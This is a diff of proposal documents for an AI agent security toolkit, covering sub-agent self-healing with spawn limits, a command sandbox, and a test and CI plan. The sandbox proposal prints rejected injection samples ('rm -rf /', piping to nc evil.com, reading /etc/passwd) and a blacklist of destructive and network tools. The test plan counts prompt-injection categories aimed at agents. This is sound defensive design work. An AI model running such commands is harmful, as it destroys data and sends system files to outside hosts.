+    Spawning --> Healthy: New instance OK
+    Spawning --> Failed: Max replicas reached
+    Critical --> Failed: Root cause is bad deployment
+    Failed --> [*]: Alert OWNER and stop
+```
+
+## 防止無限增生 / Preventing Runaway Spawning
+
+這是此架構最關鍵的安全考量：
+
+| 機制 / Mechanism | 說明 / Description | 設定 / Setting |
+|-----------------|-------------------|---------------|
+| Max Replicas | 最大副本數上限 | 3 |
+| Cooldown | 兩次 spawn 之間的最短間隔 | 60 seconds |
+| Backoff Jitter | 避免驚群效應的隨機延遲 | 0-500ms |
+| Failure Budget | 累計錯誤預算 | 50 errors/hour |
+| Quorum Check | 只有 leader 能觸發 spawn | Lease-based |
+| Root-Cause Gate | 壞部署時禁止 spawn | Auto-detect |
+
+## 配置 / Configuration
+
+```json
+{
+  "self_healing": {
+    "enabled": false,
+    "watchdog": {
+      "check_interval_seconds": 30,
+      "health_signals": ["http_health", "heartbeat", "error_rate", "memory"],
+      "anomaly_threshold": 3
+    },
+    "recovery": {
+      "max_replicas": 3,
+      "cooldown_seconds": 60,
+      "backoff_base_ms": 1000,
+      "backoff_max_ms": 30000,
+      "jitter_ms": 500
+    },
+    "leader_election": {
+      "lease_duration_seconds": 300,
+      "renew_interval_seconds": 60
+    },
+    "safety": {
+      "failure_budget_per_hour": 50,
+      "block_on_bad_deployment": true,
+      "audit_all_recovery_actions": true
+    }
+  }
+}
+```
+
+## 實作步驟 / Implementation Steps
+
+1. **Phase 1** — Watchdog sub-agent 基礎架構
+2. **Phase 2** — 健康指標收集（依賴 Health Check 提案）
+3. **Phase 3** — Leader election 機制
+4. **Phase 4** — Recovery manager + spawn 邏輯
+5. **Phase 5** — 安全護欄（max replicas, cooldown, budget）
+6. **Phase 6** — 審計日誌整合（依賴 Audit Layer 提案）
+
+## 前置依賴 / Prerequisites
+
+- Health Check / Watchdog 機制 (P0) — 提供健康指標
+- 失控保護機制 (P1) — 提供 failure budget 基礎
+- NemoClaw 相容審計層 (P2) — 提供審計日誌
+
+## 驗收標準 / Acceptance Criteria
+
+- [ ] Watchdog sub-agent 可獨立運作
+- [ ] 支援 6 種以上健康指標
+- [ ] Leader election 避免多個 leader 同時操作
+- [ ] Max replica + cooldown 防護就位
+- [ ] 壞部署時自動停止 spawn
+- [ ] 所有自癒動作記錄在審計日誌
+- [ ] 完整的架構決策文件
+
+---
+
+> 🦞 *「龍蝦會斷肢再生，系統也能自我修復」— 社群討論靈感*
+> 📄 Related Issue: `feat: Sub-Agent 監控架構 — 龍蝦自癒模式`

--- a/docs/proposals/system-command-sandbox.md
+++ b/docs/proposals/system-command-sandbox.md
@@ -1,0 +1,190 @@
+# 系統指令安全沙箱
+
+# System Command Security Sandbox
+
+> **Priority / 優先級**: P1
+> **Status / 狀態**: Proposed / 提案中
+> **Target Version / 目標版本**: v1.5
+
+---
+
+## 問題描述 / Problem Statement
+
+目前 `TOOL_POLICY.md` 將 `run_command` 統一歸類在 T1（OWNER_ONLY），但實際上唯讀的監控指令（如 `df`, `ps`, `du`）風險極低，應該可以開放給更多角色使用。同時，需要一個安全沙箱來防止指令注入攻擊。
+
+Currently `TOOL_POLICY.md` classifies `run_command` entirely as T1 (OWNER_ONLY), but read-only monitoring commands (like `df`, `ps`, `du`) are very low-risk and should be available to more roles. A security sandbox is needed to prevent command injection attacks.
+
+### 社群背景 / Community Context
+
+工程師回饋指出 agent 應該能內建執行基本系統指令來進行自我監控：
+- `df` — 磁碟使用量
+- `free` / `vm_stat` — 記憶體使用量
+- `ps` — 程序列表
+- `du` — 目錄大小
+- `services` / `launchctl` — 服務狀態
+
+---
+
+## 指令分類 / Command Classification
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TD
+    CMD["📝 System Command<br/>系統指令"] --> CL{"🔍 Classifier<br/>分類器"}
+
+    CL -->|"whitelist match"| T3["🟢 T3: Read-Only<br/>唯讀 — 已認證使用者可執行"]
+    CL -->|"restricted match"| T1["🟡 T1: Owner-Only<br/>受限 — 僅 OWNER"]
+    CL -->|"blacklist match"| T0["🔴 T0: Blocked<br/>禁止 — 完全封鎖"]
+    CL -->|"unknown"| T0
+
+    subgraph "🟢 T3 白名單 / Whitelist"
+        W1["df -h"]
+        W2["ps aux"]
+        W3["du -sh"]
+        W4["free -m"]
+        W5["vm_stat"]
+        W6["uptime"]
+        W7["uname -a"]
+        W8["whoami"]
+    end
+
+    subgraph "🟡 T1 受限 / Restricted"
+        R1["top -l 1"]
+        R2["netstat"]
+        R3["lsof"]
+        R4["env"]
+    end
+
+    subgraph "🔴 T0 黑名單 / Blacklist"
+        B1["rm / rmdir"]
+        B2["kill / killall"]
+        B3["chmod / chown"]
+        B4["dd / mkfs"]
+        B5["shutdown / reboot"]
+        B6["curl / wget"]
+    end
+
+    T3 --> W1 & W2 & W3 & W4 & W5 & W6 & W7 & W8
+    T1 --> R1 & R2 & R3 & R4
+    T0 --> B1 & B2 & B3 & B4 & B5 & B6
+
+    style T3 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style T1 fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style T0 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+```
+
+## 沙箱執行流水線 / Sandbox Execution Pipeline
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+sequenceDiagram
+    participant U as 👤 User
+    participant S as 🛡️ SHIELD
+    participant C as 🔍 Classifier
+    participant V as ✅ Validator
+    participant SB as 📦 Sandbox
+    participant OS as 🖥️ OS
+
+    U->>S: Execute "df -h"
+    S->>S: Identity + Permission check
+    S->>C: Classify command
+    C->>C: Match whitelist ✅
+    C->>V: Validate arguments
+    V->>V: Check for injection patterns
+    V->>V: Check arg whitelist
+    V-->>SB: Safe to execute
+    SB->>SB: Set timeout (5s)
+    SB->>SB: Set output limit (4KB)
+    SB->>OS: Execute in restricted shell
+    OS-->>SB: Raw output
+    SB->>SB: Sanitize output
+    SB-->>U: Safe result
+
+    Note over V: 拒絕含有 ;, |, &&, ||, `, $() 的參數
+    Note over SB: Timeout: 5s / Output: 4KB max
+```
+
+## 參數驗證 / Argument Validation
+
+防止透過參數進行注入攻擊：
+
+```
+# 允許 / Allowed
+df -h
+ps aux
+du -sh /app
+
+# 拒絕 / Rejected (injection attempts)
+df -h; rm -rf /          # command chaining
+ps aux | nc evil.com 80  # pipe to network
+du -sh $(cat /etc/passwd) # command substitution
+df `whoami`               # backtick execution
+```
+
+### 驗證規則 / Validation Rules
+
+1. **禁止 shell 元字元**: `;`, `|`, `&&`, `||`, `` ` ``, `$()`, `>(`, `<(`
+2. **禁止路徑穿越**: `../`, 絕對路徑須在白名單內
+3. **引數數量限制**: 最多 5 個參數
+4. **引數長度限制**: 每個參數最多 100 字元
+
+## 配置 / Configuration
+
+```json
+{
+  "command_sandbox": {
+    "enabled": true,
+    "execution": {
+      "timeout_ms": 5000,
+      "max_output_bytes": 4096,
+      "restricted_shell": true
+    },
+    "whitelist": {
+      "t3_commands": ["df", "ps", "du", "free", "vm_stat", "uptime", "uname", "whoami"],
+      "t1_commands": ["top", "netstat", "lsof", "env"]
+    },
+    "blacklist": ["rm", "rmdir", "kill", "killall", "chmod", "chown", "dd", "mkfs", "shutdown", "reboot", "curl", "wget"],
+    "argument_validation": {
+      "block_shell_metacharacters": true,
+      "block_path_traversal": true,
+      "max_args": 5,
+      "max_arg_length": 100
+    },
+    "allowed_paths": ["/app", "/tmp", "/var/log"]
+  }
+}
+```
+
+## 跨平台考量 / Cross-Platform Considerations
+
+| 功能 / Function | Linux | macOS | Windows |
+|----------------|-------|-------|---------|
+| 磁碟使用 / Disk | `df -h` | `df -h` | `wmic logicaldisk` |
+| 記憶體 / Memory | `free -m` | `vm_stat` | `wmic memorychip` |
+| 程序 / Process | `ps aux` | `ps aux` | `tasklist` |
+| 目錄大小 / Dir size | `du -sh` | `du -sh` | `dir /s` |
+| 服務 / Services | `systemctl list-units` | `launchctl list` | `sc query` |
+
+## 實作步驟 / Implementation Steps
+
+1. 在 `TOOL_POLICY.md` 新增 `system_command` 工具類別
+2. 實作指令分類器（白名單/黑名單/受限）
+3. 實作參數驗證器（防注入）
+4. 實作沙箱執行環境（timeout + output limit）
+5. 更新 `security.config.json` schema
+6. 跨平台指令對應表
+7. 更新文件
+
+## 驗收標準 / Acceptance Criteria
+
+- [ ] 白名單指令在 T3 等級可用
+- [ ] 黑名單指令在 T0 完全封鎖
+- [ ] 未知指令預設拒絕
+- [ ] 參數注入嘗試被攔截
+- [ ] 執行超時 5 秒
+- [ ] 輸出限制 4KB
+- [ ] 跨平台指令對應文件
+
+---
+
+> 📄 Related Issue: `feat: 系統指令安全沙箱`

--- a/docs/proposals/test-suite-ci-cd.md
+++ b/docs/proposals/test-suite-ci-cd.md
@@ -1,0 +1,273 @@
+# 測試套件與 CI/CD
+
+# Test Suite & CI/CD Pipeline
+
+> **Priority / 優先級**: P0
+> **Status / 狀態**: Proposed / 提案中
+> **Target Version / 目標版本**: v1.5
+
+---
+
+## 問題描述 / Problem Statement
+
+目前 OpenClaw Security Starter **完全沒有測試和 CI/CD**。這意味著：
+- 任何修改都可能意外破壞現有安全防線
+- 無法驗證注入防護模式是否有效
+- Pull Request 缺乏自動化品質門檻
+- Docker 建置未被驗證
+
+Currently OpenClaw Security Starter has **zero tests and zero CI/CD**. This means any modification could accidentally break existing security defenses, injection guard patterns can't be verified, PRs lack automated quality gates, and Docker builds go unverified.
+
+---
+
+## CI/CD 流水線 / Pipeline Architecture
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph LR
+    PR["📝 Pull Request"] --> L["🔍 Lint<br/>Code Style"]
+    L --> UT["🧪 Unit Tests<br/>Security Rules"]
+    UT --> ST["🛡️ Security Tests<br/>Injection Patterns"]
+    ST --> CV["📊 Coverage<br/>≥ 80%"]
+    CV --> DB["🐳 Docker Build<br/>Build + Health"]
+    DB --> MR["✅ Ready to Merge"]
+
+    L -.->|"fail"| F1["❌ Block"]
+    UT -.->|"fail"| F2["❌ Block"]
+    ST -.->|"fail"| F3["❌ Block"]
+    CV -.->|"< 80%"| F4["⚠️ Warn"]
+    DB -.->|"fail"| F5["❌ Block"]
+
+    style MR fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style F1 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+    style F2 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+    style F3 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+    style F4 fill:#d4ac0d,stroke:#f1c40f,color:#1a1a2e
+    style F5 fill:#922b21,stroke:#e74c3c,color:#ecf0f1
+```
+
+## 測試架構 / Test Architecture
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+graph TB
+    subgraph "🧪 Test Suite"
+        subgraph "Unit Tests / 單元測試"
+            T1["shield.test.ts<br/>SHIELD 存取控制"]
+            T2["agent-rules.test.ts<br/>行為規則"]
+            T3["injection-guard.test.ts<br/>注入防護"]
+            T4["tool-policy.test.ts<br/>工具權限"]
+            T5["config.test.ts<br/>配置驗證"]
+        end
+
+        subgraph "Integration Tests / 整合測試"
+            T6["pipeline.test.ts<br/>完整驗證流水線"]
+            T7["docker.test.ts<br/>Docker 建置"]
+        end
+
+        subgraph "Test Data / 測試資料"
+            D1["injection-patterns.json<br/>39+ 注入模式"]
+            D2["valid-configs.json<br/>有效配置"]
+            D3["mock-contexts.ts<br/>模擬上下文"]
+        end
+    end
+
+    T1 & T2 & T3 & T4 & T5 --> D1 & D2 & D3
+    T6 --> T1 & T2 & T3 & T4
+    T7 -.->|"Docker required"| T6
+
+    style T1 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style T2 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style T3 fill:#7d3c98,stroke:#9b59b6,color:#ecf0f1
+    style T4 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style T5 fill:#1a5276,stroke:#3498db,color:#ecf0f1
+    style T6 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+    style T7 fill:#1e8449,stroke:#2ecc71,color:#ecf0f1
+```
+
+## 測試計畫 / Test Plan
+
+### 1. SHIELD 存取控制（~15 test cases）
+
+| # | 測試案例 / Test Case | 預期 / Expected |
+|---|---------------------|----------------|
+| 1 | DM 訊息自動通過 | PASS |
+| 2 | 頻道 + 正確 @mention | PASS |
+| 3 | 頻道無 mention | REJECT |
+| 4 | Discord `<@BOT_ID>` 格式 | PASS |
+| 5 | LINE `@DisplayName` 格式 | PASS |
+| 6 | Telegram `/command` 格式 | PASS |
+| 7 | OWNER ID → bypass | BYPASS |
+| 8 | DELEGATE ID → limited | LIMITED |
+| 9 | UNTRUSTED ID → restricted | RESTRICTED |
+| 10 | BLOCKED ID → reject | BLOCK |
+| 11 | OWNER guild bypass | BYPASS |
+| 12 | 無效 mention 格式 | REJECT |
+| 13 | 空 message | REJECT |
+| 14 | Rate limit exceeded | THROTTLE |
+| 15 | Multiple mentions | PASS (first match) |
+
+### 2. 注入防護（~45 test cases）
+
+測試所有 39+ 個注入模式 + edge cases：
+
+```mermaid
+%%{init: {'theme': 'dark'}}%%
+pie title 注入模式分類 / Injection Pattern Distribution
+    "Direct Override 直接覆蓋" : 8
+    "Role Hijack 角色劫持" : 7
+    "Jailbreak 越獄" : 6
+    "Special Tokens 特殊標記" : 5
+    "Encoding Bypass 編碼繞過" : 4
+    "Structural 結構異常" : 5
+    "Length Attack 長度攻擊" : 3
+    "Edge Cases 邊界案例" : 7
+```
+
+### 3. TOOL_POLICY（~20 test cases）
+
+- T0 BLOCKED: `delete_file`, `run_query` → 確認被禁止
+- T1 OWNER_ONLY: `reload_config`, `run_command` → 僅 OWNER 可用
+- T2 DELEGATE: `read_file`, `http_request` → OWNER + DELEGATE
+- T3 AUTHENTICATED: `web_search` → 已認證使用者
+- T4 PUBLIC: 公開工具
+- 未註冊工具 → 預設拒絕
+
+### 4. Config 驗證（~10 test cases）
+
+- 有效配置 → 通過
+- 缺少必要欄位 → 錯誤
+- 無效值（負數、超範圍） → 錯誤
+- 預設值回退 → 正確
+
+## 目錄結構 / Directory Structure
+
+```
+tests/
+├── unit/
+│   ├── shield.test.ts
+│   ├── agent-rules.test.ts
+│   ├── injection-guard.test.ts
+│   ├── tool-policy.test.ts
+│   └── config.test.ts
+├── integration/
+│   ├── pipeline.test.ts
+│   └── docker.test.ts
+├── fixtures/
+│   ├── injection-patterns.json
+│   ├── valid-configs.json
+│   └── invalid-configs.json
+└── helpers/
+    ├── mock-context.ts
+    └── test-utils.ts
+```
+
+## GitHub Actions Workflow
+
+### `.github/workflows/ci.yml`
+
+```yaml
+name: CI
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+
+jobs:
+  lint:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with:
+          node-version: '20'
+      - run: npm ci
+      - run: npm run lint
+
+  test:
+    runs-on: ubuntu-latest
+    needs: lint
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with:
+          node-version: '20'
+      - run: npm ci
+      - run: npm test -- --coverage
+      - uses: actions/upload-artifact@v4
+        with:
+          name: coverage
+          path: coverage/
+
+  security-test:
+    runs-on: ubuntu-latest
+    needs: lint
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with:
+          node-version: '20'
+      - run: npm ci
+      - run: npm run test:security
+
+  docker-build:
+    runs-on: ubuntu-latest
+    needs: [test, security-test]
+    steps:
+      - uses: actions/checkout@v4
+      - name: Build Docker image
+        run: docker build -t openclaw-security-test .
+      - name: Verify container starts
+        run: |
+          docker run -d --name test-container openclaw-security-test
+          sleep 5
+          docker inspect --format='{{.State.Health.Status}}' test-container || true
+          docker stop test-container
+          docker rm test-container
+```
+
+## 配置檔案 / Config Files
+
+### `package.json` (新增 scripts)
+
+```json
+{
+  "scripts": {
+    "test": "vitest run",
+    "test:watch": "vitest",
+    "test:coverage": "vitest run --coverage",
+    "test:security": "vitest run tests/unit/injection-guard.test.ts",
+    "lint": "eslint . --ext .ts,.js",
+    "lint:fix": "eslint . --ext .ts,.js --fix"
+  }
+}
+```
+
+## 實作步驟 / Implementation Steps
+
+1. 初始化測試框架（Vitest）
+2. 建立測試目錄結構
+3. 撰寫 SHIELD 測試
+4. 撰寫注入防護測試（39+ patterns）
+5. 撰寫 TOOL_POLICY 測試
+6. 撰寫配置驗證測試
+7. 建立 GitHub Actions workflow
+8. 加入 Docker build 驗證
+9. 設定覆蓋率門檻
+
+## 驗收標準 / Acceptance Criteria
+
+- [ ] Vitest 測試框架配置完成
+- [ ] SHIELD 測試 ≥ 15 cases
+- [ ] 注入防護測試覆蓋 39+ patterns
+- [ ] TOOL_POLICY 測試覆蓋 5 tiers
+- [ ] Config 驗證測試 ≥ 10 cases
+- [ ] GitHub Actions CI 正常運作
+- [ ] Docker build 驗證通過
+- [ ] 總覆蓋率 ≥ 80%
+
+---
+
+> 📄 Related Issue: `chore: 加入測試套件與 CI/CD`


### PR DESCRIPTION
## Summary / 摘要

為 OpenClaw Security Starter 新增完整的發展路線圖與 6 份改進提案文件，涵蓋健康監控、安全沙箱、審計強化等方向。所有文件皆為雙語（正體中文 + English），並附有 Mermaid 架構圖（dark theme）。

Add a comprehensive roadmap and 6 improvement proposal documents for OpenClaw Security Starter, covering health monitoring, security sandbox, audit enhancement, and more. All documents are bilingual (Traditional Chinese + English) with Mermaid architecture diagrams (dark theme).

## 新增文件 / New Files

| File | Description |
|------|-------------|
| `docs/ROADMAP.md` | 路線圖總覽 / Roadmap overview with Gantt chart & architecture evolution |
| `docs/proposals/health-check-watchdog.md` | P0: Health Check / Watchdog 機制 |
| `docs/proposals/test-suite-ci-cd.md` | P0: 測試套件與 CI/CD |
| `docs/proposals/system-command-sandbox.md` | P1: 系統指令安全沙箱 |
| `docs/proposals/failure-budget-rate-cap.md` | P1: 失控保護機制 |
| `docs/proposals/nemoclaw-audit-layer.md` | P2: NemoClaw 相容審計層 |
| `docs/proposals/sub-agent-monitoring.md` | P2: Sub-Agent 監控 — 龍蝦自癒模式 🦞 |

## Related Issues

- #3 — feat: Health Check / Watchdog 機制
- #4 — feat: Sub-Agent 監控架構 — 龍蝦自癒模式
- #5 — feat: 系統指令安全沙箱
- #6 — feat: 失控保護機制
- #7 — feat: NemoClaw 相容審計層
- #8 — chore: 加入測試套件與 CI/CD

## 路線圖架構 / Roadmap Architecture

```mermaid
%%{init: {'theme': 'dark'}}%%
graph TB
    subgraph "v1.0 — Current"
        S1["SHIELD"] 
        S2["AGENT_RULES"]
        S3["INJECTION_GUARD"]
        S4["TOOL_POLICY"]
    end
    subgraph "v1.5 — Planned"
        H["Health Check"]
        T["Test Suite"]
        SB["Command Sandbox"]
        FB["Failure Budget"]
    end
    subgraph "v2.0 — Vision"
        A["Audit Layer"]
        SA["Sub-Agent 🦞"]
    end
    S1 --> H
    S4 --> SB
    S3 --> FB
    H --> SA
    SB --> A
    T --> FB
```

## 背景 / Context

此路線圖源自社群討論，包括：
- 舊金山後端工程師提出的 K8s 自癒架構概念
- NVIDIA NemoClaw 審計層效能影響的探討
- 工程師建議 agent 內建系統指令（`df`, `ps`, `du`）進行自我監控

## Test plan

- [x] 所有 Markdown 文件語法正確
- [x] Mermaid 圖表使用 dark theme
- [x] 雙語內容完整（正體中文 + English）
- [x] Issue 連結正確對應
- [ ] Review: 確認提案內容與現有架構一致

🤖 Generated with [Claude Code](https://claude.com/claude-code)